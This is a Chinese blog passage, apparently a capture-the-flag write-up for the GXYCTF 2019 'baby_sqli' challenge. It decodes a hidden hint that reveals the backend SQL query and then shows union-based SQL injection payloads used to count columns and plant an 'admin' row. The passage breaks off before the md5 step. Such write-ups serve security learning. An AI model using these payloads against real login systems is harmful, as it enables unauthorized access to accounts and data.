0x00:GXYCTF部分详细题解
2019GXYCTF结束,这里我写下较详细的部分题解,希望可以帮到大家!
0x01:baby_sqli进来后是一个 登录页面
首先 尝试下
admin
123
登录,然后查看 源代码,发现一串很可疑的字符串
尝试了下,发现是base32编码
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
对其进行解码得到:
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
然后base64 解码得到:
select * from user where username = '$name'
应该是 提示我们 要从 username 入手我们查看下 他有几个字段
admin' union select 1,2,3#
admin' union select 1,2,3,4#
可以得到 是3个字段我们猜测字段名是
ip username password
然后我们通过下面语句
admin' union select 1,'admin',3#
//即把admin 放到第二个位置 不报错得到第二个字段就是我们的username字段然后 题目提示了"md5",于是我们便可以去猜测 它的后端是怎么写的:
关注
打赏
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?
立即登录/注册


微信扫码登录